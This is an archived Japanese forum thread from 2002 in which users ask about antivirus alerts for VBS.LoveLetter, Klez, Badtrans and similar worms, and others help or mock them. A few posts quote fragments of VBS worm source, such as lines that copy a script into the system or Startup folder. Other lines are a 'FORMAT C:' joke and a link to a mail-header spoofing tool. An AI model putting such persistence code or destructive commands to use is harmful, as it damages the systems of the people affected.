☆ウィルス情報＆質問　総合スレッド☆part4

なんか、さっきから２ｃｈアクセスするたびにVBS.LoveLetter.Aの感染警告
メッセージをノートン先生が出すのだが・・・

>>548 ｶﾞｲｼｭﾂ。このスレさかのぼれ。

それはVBS.Internalだべ。
らヴれたーはhttp://pc.2ch.net/test/read.cgi/sec/1000753945/
この>>38-39がひっかかってんじゃないか？

どのウィルスかは問題じゃない、VBSだから同じこと

>551
ふむふむ。(゜_゜)
じゃ、『やりおるな、ノートン先生！』ということで・・・

質問です。klezウイルスって何ですか？
私は携帯から２ちゃんにアクセスしてるんですけど、影響はありますか？

>>553
全く問題無いです。

最近はやりのLOVE-LETTER-FOR-YOUって書いてあるスレ開いても、ノートン先生が何も反応しません。
何か問題でもあるんでしょうか？

無い

既出だったらスマン。
今ニュー速でloveletterウィルスかかったとかかかってないとかで騒いでいます。
これはウィルスですかね？
リンク踏んでも大丈夫ですかね？

ウイルスなわけだが
http://corn.2ch.net/test/read.cgi/news/1025863781/l50

>>557
すぐ前に書いてあっても読めないのはあなたの頭が感染しているのでは？

>>558
loveletterについては>>555で書いてあるのは読んでいますけれど、
loveletterにかかったときの対策法については何も書いてませんよね？
だから改めて書いたのですが。

>>559 この板のあちこちでｶﾞｲｼｭﾂ、もううんざりだ。ニュー速へ帰れ。

>>560
他のスレを探したのですがloveletterについてのスレは見つかりません。
既出ならそのスレを貼っていただけますか？
そちらを見ますので。

http://pc.2ch.net/test/read.cgi/sec/1023828379/l50

http://www.google.co.jp/を開いてテキストボックスに
loveletter virus removeといれてEnterキーを押す。
すると削除方法を記述したページを自動的に検索して表示してくれる。
後はリンク先を読めば良い。

全てのウィルスの削除方法がこの板にないといけないのか？

>>561 ニュー速住人はウィルスごとにスレッドが立ってると思いこんでいる。

>>563は死んでください

( ﾟДﾟ)ﾊｧ?

今日はどのスレッドを見てもデジャヴ感覚が味わえる。

隊長！涙目の557が逃げていきます!

>>565
有り難いお申し出ですが、この度は遠慮しておきます。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
↑のレスでもちらほらみるがこの奇数月の6日に作動するワーム、今はやってるの？

明日どうなってるかな？

>>570 Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/

当方ノートンインターネットセキュリティ２００２を使っていますが、
初めてウイルスが検出しました。VBS.LoveLetter.Aです。それでそれを
修復しようとしたら出来ませんでした。それで今は検疫しています。

これからどうしたらいいのでしょうか？よろしくお願いします。
ちなみに最新ウイルス定義にしていても修復できませんでした。
当方パソコン初心者（女）です。わかりやすく説明お願いします。

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

(女）は余計だな(w

（女・独身・美女・性格良）　で写真付きなら
教えて君でも親切に教えるけどな。

本人の写真であると、どうやって判別すんだ?

>>573
見ました。という事は、ノートンの誤反応なのですね？
ウイルス感染ではないと？って事は、マイコンピュータのインターネット
オプションのInternet Temporary Filesの削除でいいんですね？
なんとなく判りましたのでその通りやってみました。
これで、もう一度一応ウイルススキャンしてみます。

みなさんの事を信用していない訳ではないんです。
本当にありがとうございました。
また結果報告します。

んじゃｾｷｭ板よりってメモ紙もって写真とってもらうとか・・
いずれにせよ夢を持つのは大事だ。ﾊｧﾊｧ

なんか今日知らないﾔｼから
「Internet Explorer ６」って件名のメールが届いてたんだが、これはｳｲﾙｽ？？
144ｋぐらいだったんだけど

572を騙ってグロ画像のリンクが貼られないことを望むばかり。

>>579
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/

少し上の方のレスが読めない方が多いこと多いこと

質問したら答えてくれる。敢えて面倒なことをする必要はない。



ってことだろ。

>>572は、はんてんぐわるどーで十分。

FORMAT C:

このスレを読み込んだら脳豚先生が反応したよ。なんで？


【国際】１８歳女性教師が“合法的”に集団レイプされる　−パキスタン
http://news.2ch.net/test/read.cgi/newsplus/1025954189/

ﾌｧｲﾙ
C:\PROGRAM FILES\JANE\Logs\2ch\ニュース\ニュース速報+\1025955747.dat は
VBS.Network.E ｳｨﾙｽに感染していました｡
ﾌｧｲﾙは削除されました。

ちがった、こっちのが感染してたんだ…
【ネット】看護学校受験ガイドのHPなどでメールアドレス大量流出
http://news.2ch.net/test/read.cgi/newsplus/1025955747/

過去ログみました、理由が分かりました。

最近、変わったメールが来るようになりますた。
以下、その内容。

ご無沙汰しております。
以前、何度かメールをやり取りしたユキです。
使えそうなサイトを見つけたのでメールしました。
http://www.ryoko.us/
お役にたつと嬉しいです。
では、また。

当然、メールのやり取りしたことも聞いたコトもない相手です。
貼り付けてあるアドレスってナンなんでしょう？
ブラクラ？それともやっぱりウィルスでしょうか？

>>588
ただのSPAMでしょう。
といっても「Access Denied」と出て何もなかったですが。

あの、以前にＩＥでアニメーションＧＩＦを
アニメーションさせるように設定させたままだと
セキュリティーホールをつかれてしまうという問題が
あったとおもうんですが、あれはWIndows98
は問題ないんでしょうか？

ｽｷｬﾝの種類: ﾘｱﾙﾀｲﾑ保護 ｽｷｬﾝ
ｲﾍﾞﾝﾄ: ｳｨﾙｽが見つかりました
ｳｨﾙｽ名: VBS.LoveLetter.A

ｽｷｬﾝの種類: ﾘｱﾙﾀｲﾑ保護 ｽｷｬﾝ
ｲﾍﾞﾝﾄ: ｳｨﾙｽが見つかりました
ｳｨﾙｽ名: VBS.LoveLetter.E

２ちゃんのどっかがおかしーぞ

>>591
おそらくノートンの誤作動
http://pc.2ch.net/test/read.cgi/sec/1025872269/
というのがあった。

>>591 ノートンがvbsウィルスのソースに誤反応してますた
ｽﾏｿ

http://oofun.com/annoying.shtml
友達にこのサイトのリンクをクリックしてみろといわれてやったら、
ブラクラでは無いでしょうが、ウィルスらしいものを貰ったようです。
本当にパソコンに自身のある方のみ、誰かこのサイトが何か解明してください。
お願いします。不安です。
VBS.Internalというファイルがノートンで検知されたのですが、隔離さえ出来ません。

http://pc.2ch.net/test/read.cgi/win/1026024447/l50
ウィルスを確実に喰らうサイト

なぜalertごとに"script"で挾むのか問い詰めたいサイトですね

alertがこんなにあるなんて！すごいですね

俺はHDにそのまま保存されていた
Happy99をHDを整理していて気が付いた。
間違えて実行してしまうととてつもなくやばーい事になるので
とりあえず圧縮をかける事にした。

えーとZIP圧縮、ZIP圧縮と・・・
俺はそう思いながら圧縮アプリにドラッグしようとマウスを近づけた。
しかし・・・！そのとき手が滑って

「ああっ！」
そう、間違えて他のエグザにドロップ＆ドラッグしてしまったのだ

エグザにエグザを重ねるとどうなるか知っているだろうか・・・？

タイムマシンで恐竜時代に行ったのは良いものの、
岩盤と出現場所が重なり、分子が重なり、
熱核爆発を起こしてマシンもろとも蒸発する。正にそんな感じ

HDが少し音をたてたかと思うと次の瞬間Windowが出現した

(や、やっちまった・・・)
時はすでに遅し
どんどん打ちあがるディスプレイの上の打ち上げ花火・・・

　　　　　　　　　　　　 ∩
　　 　 　 　 　 　 　 　 | |
　　　 　 　 ∧＿∧ 　 | |　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　 　 （　´Д｀）／/　　＜　先生！僕を助けてください(汗
　　　　　 ／ 　 　 　 /　　　 │
　　　　 / /|　　　　/ 　 　 　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿
　 ＿＿| | .|　　　　| 　　　
　 ＼　 ￣￣￣￣￣￣￣＼
　　||＼　　　　　　　　　　 　 ＼
　　||＼||￣￣￣￣￣￣￣||￣
　　||　 ||￣￣￣￣￣￣￣||
　　 　 .||　 　 　 　 　 　 　 ||

俺はウイルス集めだしてから初めて敗北した・・・
（まあ、後で直ぐに直ったけどね。W2Kだし

皆さんもウイルスには十分気をつけましょう。

洩れも実はklez.Hを実行してしまったことは内緒な。

携帯（ていうかエッジ）に最近大量の英語メールがくるのですが
今日確認したら今まで受信したメールボックスの中身が全部消えていました。
今日びは携帯にもウイルスがあるのですか？
ちなみに添付書類が化けたような文字列ばかりのメールです。
最初の一文がAAAAAAAA…って続いてるような感じでした。

ウイルス集めてはpgpで暗号化してた奴もいたな

あの、以前にＩＥでアニメーションＧＩＦを
アニメーションさせるように設定させたままだと
セキュリティーホールをつかれてしまうという問題が
あったとおもうんですが、あれはWIndows98
は問題ないんでしょうか？

c.Copy(dirsystem&"\うんこ.TXT.vbs")

「VBS.LoveLetter」に感染すると、
Microsoft Outlookのアドレス帳にある電子メールアドレスや、mIRCを介してインターネット上のチャットルームに自分自身を送信します。

とのことですが、それは一回きりですか？
パソコン内にウィルスが存在している限り何度でも行われるのでしょうか？

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

そんなことよりさ、ちょいと聞いてくれよ。スレにあんま関係ないんだけどさ。

このあいだ、久々に2ch覗いたんです。2ch。
そしたらなんか半角板のスレ開いたらパソコンが変な動きするんです。
で、よく見たらなんかノー�d先生が警告出して騒いでるんです。
で、ウイルススレ見てみたらどうやら原因は先生の誤反応なんです。
もうね、先生アホかと。馬鹿かと。
先生な、普段仕事してないのに厨房コピペに一々反応なんかすんな、ボケが。
厨房のコピペだよ、コピペ。
なんか親子連れとかも助けてレスしてるし。一家４人で誤反応か。おめでてーな。
よーしパパセキュリティー板で原因聞いちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、マカフィーやるから安心しろと。
誤反応ってのはな、もっと殺伐としてるべきなんだよ。
ノー�d先生がいつ誤反応しちまってもおかしくない、
反応するか反応しないかの、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと騒ぎが収まったかと思うと、ウイルス対策スレがいっぱい立ってるんです。
そこでまたぶち切れですよ。
あのな、対策スレなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、誤反応に注意！だ。
お前は本当に2chネラーかと問いたい。問い詰めたい。小１時間問い詰めたい。
お前、他人から仕入れたその場限りの知識で自慢したいだけとちゃうんかと。
先生通の俺から言わせてもらえば今、先生通の間での最新流行はやっぱり、
コールセンターに電話、これだね。
あのー誤反応がすごいんですけど。厨房対策に誤反応多めにしてくれ。これが通の頼み方。
しかしこれを頼むと次から死満テックにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前ら、ド素人は、マカフィーでもインストしてなさいってこった。

　　　　　　　　　　　　　　　　　　　　　　　

とあるHPにアクセスしたところ、タイトルが「C」となっている
小ウィンドウが現れました。すぐに閉じたのですが、閉じるまで
に時間がかかりました。
その後何の問題もなくネットを続け、パソコンの電源オフ。
先程パソコンを起動したところ、ハードディスクを作り直し
ますか？」とのダイアログが出ました。
キャンセルし、その後再起動しても何も起らないのですが、
初めての経験で不安です。
ウィルスに感染しているのでしょうか？
知識のある方々、教えて下さい。

>>607
該当サイトのURLと、OSやブラウザのその時の設定等も書いた方が、他の人もレスしやすいかと。
不安なら、ウイルスのスキャンしたらどうっしょか。

最近よくklezが送られてくるんだが、もちろん送信元のアドレスは適当に拾ってきてある。
が、、だ。メールを発射したPCのドメイン情報とか時間は詐称してないような気がするのだが
実際のところどうなのか教えてくらはい。
　あと、リターンパスには本当の送信者な気がしなくも・・・・・

>>608
ウィルスソフト入れてないんです・・・。
OSはマックOS8.6。ブラウザはIE5.0。設定とは何の設定でしょうか？

URLは履歴がないので分かりません。

>>609
その通りだと思いまする。

でも漏れのメアドに毎回送って来る人は、Nifty利用者だという事を除くと情報が無いので、気の毒です。

>>610
Macかぁ。IE5.0って古くない？
IE5.1だかをインスコしたらどうっしょ。
5.0だとファイルを勝手にダウンロード&強制実行の穴があったかと。
http://www.microsoft.com/japan/mac/products/ie/

Norton用のSymantec製品体験版、ここから落とせまする。
http://www.symantec.com/region/jp/trial/trial.html

えとですね。
「MacはWindows製品向けvilliやトラップが多いので、とりあえず安全」、ちゅうものでもないっす。

>>611さん。
やっぱそうですよね。。

漏れにくるのはOCNからなんで、何県の何地方までわかりますぜ・・・といっても押しかけるわけじゃないから関係ないか（藁

>>613
Return-Pathのメアド宛てに、警告メル送ったらどうっしょ。

>>614

このスレの様子をしばらく静観して、それがあってるなら
そうしようと思いまふ。

>>615
KLEZスレで、かなり以前から同様の話題が出ていると思いまする。
http://pc.2ch.net/test/read.cgi/sec/1024255721/

VBS.Love Letter.A
上記のがノートンで検出されたんですが・・・。
何をするウイルスでしょうか？？

>>617
これ？
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>617
きっと誤検出だと思うけど

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

どうも・・・。
誤作動なら安心です。
そういえば２ちゃんのどこか開いたらダウンしますかと出たかも・・・。
お手数かけました。

>>612
ありがとうございました。
ダウンロードしてきます。

携帯に最近よく入るウイルスメールなんですけど
ヘッダから公開してもよろしいでしょうか？昨日受信関係のデータが
全部消沈しました。
差出人は毎回変わっていて知り合いの知り合いの名前だったりもするので
あてにはならないとは思うのですが、本文が文字列なので
種類くらいは判別できるかなと思いまして…
文字列のコピペくらいはここでしても支障ないですよね？

昨日から、もう一台のPCで作業中に青画面で、ドライブCに書き込めません
というエラーがでるようになりました。スキャンディスクをかけても同じエラーで
途中で止まってしまいます。それで思い切ってクリーンインストールする事にしました。
ところがCドライブをフォーマット後、ウィンドウズMeをインストール中に
BootSector Write !
VIRUS: Continue(Y/N)?
という表示がでて止まってしまいます。この時Y、Nどちらを押しても
反応はありません。その後FDISKで領域削除、再確保からやってみよう
と思いましたが、そこでも上の表示が出てFDISKを完了できません。
これってウィルスでしょうか？(VIRUSって書いてあるし・・)
OSが消えてるのでオンラインウィルススキャンなどもできません。
途方にくれてここに書き込んでみました。
解決法ありますでしょうか？

たった今、差出人が「 2ch <[email protected]>」でタイトルが「A special new game 」
っていう、怪しい添付ファイル（INSTALL.EXEとHTMLファイル）つきのメールが来ました。
２ちゃんねらーだと知ってて送ってきたのか、無差別なものなのか気になります。
このスレでいいのかどうかわかりませんが、どなたか同じメールを受け取った人はいませんか。

自分の情報消してﾍｯﾀﾞｰ見せて下さい

>>624
こら、いきなり質問するなとちゃんと注意して誘導しただろうが。
このスレとかKlesスレの前の方を見ろと書いただろうが。
それとも初級ネットからでなく、自発的にマルチなのか？

>>625　以下がヘッダです。


Return-Path: <[email protected]>
Received: from smtp.net-keeper.net (smtp.net-keeper.com [210.157.11.225]) by **********.dti.ne.jp (1.01) with ESMTP id g68AEku08477 for <**********.dti.ne.jp>; Mon, 8 Jul 2002 19:14:46 +0900 (JST)
Received: from Gdgvfhd (061196244058.cidr.odn.ne.jp [61.196.244.58])
by smtp.net-keeper.net (8.11.2/Oh-2001-01-01) with SMTP id g68ACoq29509
for <**********dti.ne.jp>; Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Date: Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Message-Id: <[email protected]>
From: 2ch <[email protected]>
To: **********.dti.ne.jp
Subject: A special new game
MIME-Version: 1.0

>>626
すいません、自分でスレの内容から判断してここに書きこみました。
何度も質問を書きこんでスレを消費するのもまずいかなと思って。

よってたかって叩かれないように注意してやったのに
聞く気がないなら勝手にしろ。

>>623
ブートセクタが壊れたのを、「おいおい、Villiじゃねぇの？」、ってパソが警告しとるだけなんじゃないでしょか。

ハカーイHDを、もう一台のパソのHDにスレーブ接続して作業してみてはどうっしょ。
物理的に「逝っちゃった」、って可能性もアリだけど。

>>624
2chとは直接関係ないメールです。

>>631
ありがとうございます。

>>630 レスありがとうございます。
その方法を試してみます。Dドライブだけでも助かればいいのですが・・

>>633
そ言えば、起動ディスクから修復できたような。

メモありました。
http://homepage2.nifty.com/winfaq/howtoboot.html

漏れの再レス、ちょっと遅かった、かな？

とりあえずハカーイHDの中身は取り出せました。
オンラインスキャンでは何も出てこなかったのですが、
上のページのマスターブートレコードの修復法を試したら、また
BootSector Write !
VIRUS: Continue(Y/N)?
これが出て駄目でした。今度はY,Nに反応するようでした。
結局起動ドライブとして使えない様なので新しいHDD買ってきます。
壊れたほうはとりあえず隔離しときました。データドライブとしても
あやしいので・・ありがとうございましたー。

>636
もう遅いかな？
BIOS設定を変えてみて下さい

Badtranceってダイヤルアップ接続をプチプチ勝手に切ったりしますか？
どうも感染しているらしく、友達のPCにウイルスメールを送っているみたい
なんですが、オンラインスキャンしようにも途中で勝手に接続切られて
駆除ツールのDLもできません。
友達の家に来たのはBadtranceだったらしいのですが、本当にうちから送られたのかは
確かめる前に消したらしく、もしかしたらほかのウイルスかも･･
ちなみにWIN98SEです。

>>638 回線切って、アンチウィルスソフト買ったら？
接続してるとどんどん撒き散らしてるのはわかるよね。加害者なんだよ。
ちなみに、”Badtrans”だよ。

>>639
すみません･･ぱにくってて接続してたら撒き散らすことを忘れていました･･
帰りにソフト買ってみます。（いまは学校からで、家のは切ってあります）
お返事ありがとうございました。

今日ＭＸで動画を交換でＤＬさせて貰った相手から
「すいません。さっきのファイルにウイルスが入ってました。
しかも、たちの悪いことにどっかのキチガイのお手製なんで
アンチウィルスソフトにも引っ掛りません。
もし既に再生してたら連絡ください。」
ってＩＭが来てて、そのＩＭに気付いた時にはその人は、
既にオフラインになってて連絡の取り様がないんで困っています。

既に再生してしまってたんで、色々検索して調べてみたんですが、
Ｍｐｅｇのファイルでウィルスに感染する事は無いと書いたページが
有ったんで、ただのイタヅラかと思っているんですが、、、。

一応オンラインウイルススキャンをしてみても何も引っ掛りませんでした。

それは、ご愁傷様。

てか最低限の知識も無いﾔｼがMXとかしてるからこんなに
ウンコみたいなウィルスとか広まるんだよなあ

>>643 「ウィルス」ではない。前段は同意。

っていうか、実際Ｍｐｅｇファイルを見ただけでウイルスに
感染する事なんてないよ。、、、、、ね？

また来ました。怪しげなメールです。
件名が「customer」「mitsuto」「kazuya」「kanime」の4通のメールで、
メールサイズがいずれも130KB前後。
来た覚えがあるって人はレスください。

どうやら4通ともウィルスのようでした。
Hotmailをブラウザからみると、本文の部分のHTMLに書かれたコードも
全部抹消してしまうみたいなので、
ウィルスの種類までは特定できませんでした。
とりあえず、ありがとうございました。

ちょっとマジ質問。
今日(七月九日)の午後四時くらいから、
2チャンネルのニュース速報＋にアクセスした途端、
ノートンアンチウィルスがVBS.LOVELETTER.Aを検出しました。
検出場所はTemporary internet filesにおいてです。
他の板にアクセスした場合も検出することがあるみたいなんですが、
皆さんのは大丈夫でしょうか？

http://pc.2ch.net/test/read.cgi/sec/1025872269/

ああ、ノートン先生の誤反応らしいわけで既出っぽいですね。
失礼失礼。

あっけなく流されているけど、かなりネット慣れしているっぽい人がいる。。。。。

>>645
残念ながらあります。
win2000で強制シャットダウンしたmpgも経験あり。
http://mxtrojan.tripod.co.jp/

>>648
今さっきいきなりでてビックリした…
書き込みしようとしたらで意味不明だったけど誤反応だったのね。
安心した…

>>652 拡張子mpgに偽装してあるだけで、実際はmpegじゃねーじゃねーか。

大体ウィルスの定義わかって言ってるのか小一時間・・・

緊急！！「ＮortonＡntivirus」でウィルスが検出されました。修復できませんでした。」
とでました。この場合どういう処置をとればいいのでしょうか？
どなたかおしえてください。困っています・・・。ｸﾞｽﾝ。

ウィルス名も書かないでわかると思ってるのか小一時間・・・
過去ログ読む気も無いのか小一時間・・・

>>656 検疫されてるだろ。レポートの検疫のところ見ろ。ついでに削除も
してしまう。

>>656
お前ニュー速+でコピペしまくってる奴じゃないか？

ＶＢＳ.Ｎｅｔｗｏｒｋ.Ｅっていうやつです。
>>659
違います

だから過去ログよめ
大体658に書いてあんだろ

2ｃｈ見てると VBS.LoveLetter.Aに感染したんだけど、なんなの？？？

過去ログ読め

激しく既出ですた。。すまんこ

2ちゃんでノートンが反応したのは、感染ではなく検出なんだから騒がなくてよろしい。

どうしてそこらへんが分からないのか…

農豚がデカデカと「感染」って出すからだろー
先生はちょっと頭がおかしい

「何か気になる点を教えてもらえますか？」
「夜中、犬の様子が変だったんです。」
「あの犬は夜中、何もしませんでしたよ？」

「だから、変なんです。」　と、シャーロックホームズは言った。

これにウィルスはいってないかどうか教えて。
http://dms100.org/worksucks

暖房うざい

>>668 自分でチェックしな。

同じウイルスがよくメールで送りつけられるのですが。
ウイルス送る奴にアドレスが知られてるって事でしょうか

>>671 本人が知ってるかはわからないが、感染者のPCの中にあなたのメア
ドが記録されてることは確か。それはアドレス帳の場合もあれば、HPに記
載したメアドや掲示板に書き込んだメアドがキャッシュとなって残ってい
る場合もある。

ただし最近のウィルスは送信者として現れている者が感染者とは限らない
ので、メールの「送信者」欄にある人があなたのメアドを知っているとは
限らない。

＞６７２　ありがとうございます

６６８が踏んだため。

たすけてください！！！！！！！！！！！！！！
先ほどnorton antivirrusがウイルスを感知しました。
VBS.Network.Eというウイルスらしいのですが、修復も検疫も削除もできません。

どうすればよいのでしょうか？
だれか助けてください！！！！！！！！！！！！！！！！！！

お腹いっぱい。

さきほど検疫したら直ったみたいです。
おさわがせしてもうしわけございませんでした。
何度もトライすればなおるもんなんですかね？

一人で勝手に騒いでるのはお騒がせしたとは言わない

つーか過去ログ見ろよ

お騒ぎしまして、申し訳ござらん。

さっきPC内検索したらskdll.dllって不明アプリがシステムから出てきた
んだけど、これ元々システムフォルダに組み込まれているものですか？
ウイルスだったら思い当たるふしは某UG系ソフト・・・

>>681
気にするな

>>681
http://www.google.com/search?q=skdll.dll&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

あぼーん

>>684 威力業務妨害だよ。令状あればログから書き込み者が割り出せるから
このあたりで止めた方がいいぞ。

sage

　

>>687
気にするな

>>687
俺も元カキコは見てないが、削除依頼を見たところでは
ウィルスメールの送付を依頼する内容だったらしい。

>>689
気にするな(w

>>690
うん、わかった。
天気もいいことだし、これからサイクリングにでも逝ってくるよ。

うらやますぃ〜

[email protected] というところからa とだけ書かれたメールがきました。これ何？

>>693
NASAの陰謀

NSAの謀略

NSの策略

Nの陰毛

ンボマ

JS_NOCLOSE
JOKE_MADO.A
ＢＫＤＲ_ＢＯ２Ｋ
このウイルスの削除の仕方教えてください。
サイトを見てもやり方が解らないんです

>>699
複数のに一度に感染かぁ。
何したのか知らんけど。
検出できないのを喰らってる可能性もあるから、OSクリーンインストールした方がいいんじゃないっしょか。

ちゅうか。
どのフォルダから検出されたのかとか、それはどゆファイルだったのかとか、OS何かとか書いて欲しかった。

MeやXPのシステム復元に使うrestoreフォルダとか、IEのキャッシュから、昔拾ってそのままにしていたzipファイル、とかね。

忙しいのに体調不良なんで、寝まする。

すいません。
ＯＳはＭＥで、ＲＥＳＴＯＲＥに感染してました・・・

>>702
気分悪くて、ちょっと夕食吐いてきたところなんですが。
何となく気になって見たら、君のレスがきとりました。

どんぞ。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2186
http://www.microsoft.com/japan/support/kb/articles/JP263/4/55.asp

ちなみに今回の感染源は、ちょっと変色したカツオの叩きっす。
さっさと嫁でももらって、健康管理してもらった方がいいのかもしれませぬ。

湿気高いし暑いから生ものは注意せなあかんよ。

ろくきゅうご
あんたも俺も、すでに盗聴対象です

なぜか急に「閉じる」「最小化」とかパソコンのあらゆる項目などがギリシャ文字みたいな
やつに変わってしまったんですがこれはウイルスですか？あとワードなどで印刷したり
したらパソコン上に表示されてるやつと印刷した文字が違うんです。どなたか親切な方
教えてください。ウイルスであればどうすれば直りますか？

≪Super FAQ≫
・最大化・最小化ボタンが数字or記号に！
http://homepage2.nifty.com/winfaq/fontstrouble.html

印刷時の文字が違うってのはどう考えてもウィルスの仕業じゃ
無いと思うんだが。激しくいた違いなのでビジネスソフト系の板
にでも行って質問すれ

>>706
プリンタのケーブルの確認と設定の見直し。
まずはそこから。

707さん708さんありがとうございました！！やってみます！

W32.Kitro.C.Wormウィルスに感染したみたいです。
ネットで調べたら、Kitro.Aは載っていて、ＭＳＮメッセンジャー経路の
ウィルスだと分りました。
でも、情報が少なく、またKitoro.Cについては、探しても
見つけることができません。
ちなみに、ノートンでは、削除などできない、と出てしまって、
どうやって駆除すればいいか、教えてください。
お願いします。

http://securityresponse.symantec.com/avcenter/venc/data/w32.kitro.c.worm.html
これちゃうの

>>711
それです、それ！！
本当にありがとうございます。
助かりました。
これから、さっそく読んで、解決します。
m(._.)mペコッ

携帯電話が感染ていうのはありますでしょうか？
チェーンメールで送られてきて下のカーソルが効かなくなってしまいました。

>>706-708
ｻﾝｷｮ！オレも706と同じ状態で、
すぐに治ったYO！

MXで動画をダウンロードして開いたら突然電源が切れました。すぐ再起動し
て特に問題はなかったのですが、それ以来パソコンを起動してディスクトップ
画面がでると電源が切れ、再起動しスキャンディスクが終了してまた同じこ
とを繰り返す・・・、こういった症状が頻繁に起こるようになったのです。
ウィルスでしょうか？
この症状を御存知の方、情報をお待ちしています。宜しくお願い致します。

218.50.39.122
ここから攻撃されたよ。

ありがとう>>682-683

>>713
ウイルスではなく、バグです。電源を切れば直ります。
画像読み込みをしなければ発生しません。

>>15
死ね

だれか教えてください。
画像ファイルが勝手に「あぼーん」に置き換わるんですが。
ちなみに、OPERAもやられたか、デスクトップにも小さく「あぼーん」と・・・。

>>720
幻覚症状だ

>>720
スクリーンショットうｐしろ。

>>720
MXやってたろ。

>>720 MXやめて再インスコしろ。

ＩＥ５のテンポラリーファイルで
「ＶＢＳ．ＮＥＴＷＯＲＫ．Ｅ」ウィルスが検知されました
これって単純にデリートされるんですか？

どうもクレ板のキャッシュみたいなんですけど

>>725
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

ガイシュツだったんですね
イタズラとのことですが、一応ＤＥＬＬしました

ありがとうございました

ＤＥＬＬ

Dell Computer
http://www.dell.com/jp/

4500Cは確かに買い得かもな・・・

KOPIGDKO.EXE
という添付のメールが届きました。
送信者も賢明も書いてありませんでした。
ウイルスでしょうか？
トレンドマイクロで検索しましたが出てきませんでした。
どなたかご存知だったら教えてください。
よろしくおながいします

http://js-web.cside.com/

開けてみれば分かる。

>>730 分からなければ捨てよ。アンチウィルスソフト常駐させよ。

KO*KOでピンと来ないもんかね

最近フリーズが多いんですけど、ウイルスでしょうかね？
そんな症状を生み出すウイルスっていますか？

最近なんでもかんでもウィルスのせいにする奴が多いんですけど、ウィルスでしょうかね？
そんな症状を生み出すウィルスっていますか？

>>730
　　　　 ∧＿∧　　／￣￣￣￣￣￣￣
　　　　（　´∀｀）＜　今時HYBRISかよ
　　　　（　　　　）　＼＿＿＿＿＿＿＿
　　　　｜ ｜　|
　　　　（_＿）＿）

>>736
＞なんでもかんでもウィルスのせいにする奴
奴ではありません、それがウィルスです。
一過性のものと慢性のものがあります。
濡れ衣を着せられる前に逃げましょう。

今の地震はウィルスのせいですか？

最近、BadtransやKlezが毎週末(特に金曜日)4〜5通届きます。
このことで、メアド変更しようとも考えているのですが、
これって、誰か(クラッカー組織など)が狙ってると考えてもいいのですか?

そうだね貴方が組織に狙われるほど凄い人ならね。

>>741
俺はそんなに凄くないYo!
でも、こう毎週毎週来るって明らかにおかしいんだけど･･･。

横レス失礼します。。。

あの〜次期転職先からメールがきまして、返事だそうとしたんですが、先方はボッキー２とかっていうメーラー使ってるので、こっちが思いっきりアウトルックエキスプレスってなんだか･･･初心者っぽいじゃないですか？
そこで、ヘッダーをちょこちょこイジって、かっこよくしようと思うんです。。。

そこで諸先輩方のご助言なんですが、かっこよくメールする方法をお尋ねしたいんですが･･･Telnetとかあんまりメンドーなのは（＾＾;;;
なんか、ヘッダー部分のイジれるメーラーみたいなのとか、教えて頂きたいんですが。。。まじぽんレスです。

※　 リメーラーとか使うと、選考落ちそうなので（笑）他で何かありまでんでしょうか？
※　 http://www.big-z.net　の　Formrun Ver1.33(非会員用)のメーラーって何となく凄そうなのですが･･･如何でしょうか？

>>744
思いっきり板間違ってないか?

失礼。>>743でした。
自分に返してどーすんだ・・・。

言ってること自体間違ってるだろ

>>743
ポスペつかう
これなら本採用まちがいなし

>>743
好きなだけヘッダ偽装しろ。
http://homepage2.nifty.com/spw/radish/dl.html

でも、たぶんアンタ落ちるよ・・・

さいきん、2chのスレッドを閲覧すると、メール欄に記入のあるハンドル
名のあるところが(名無しさん＠お腹いっぱいみたいな)、
青でなく紫色で表示される事が多くなったんだけど、
これってウィルスに感染したせいなんですか。
一応ノートンを入れてあるんだけど。

だから
なんでもかんでもミソもクソもウィルスのせいにすんな
初心者がウィルスですか？ってのの98%は自分の操作の結果だからな
IEのキャッシュ消してブラウザ再起動すれ

最近、毎日のようにバッドトランスが添付されたメールが送りつけられます。その都度送信者は違うのですが、
どうもメッセージのタイトルとかが、ある事件をきっかけに疎遠になった友人と私だけが知っているような共通項が書かれていたりします。
もし恨みを買っているのなら、いくら考えてもコイツ以外には考えられません。
警察への被害届も考えていますが、どうやったら証拠がつかめるのでしょうか？
独りよがりの質問ですみませんが、教えていただけませんか？
ちなみに私のＰＣは感染していませんでした。

VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

>>751
メールヘッダ

トロイの木馬の感染経路を教えてください。
添付メール？HP見れば？
おねがいします。

>>754
いろいろ

トロイの木馬？ＨＰ見れば？

>>752反応ないよ(´･ω･`)ｼｮﾎﾞｰﾝ

ウィルスバスダが反応するのないの？？？？？
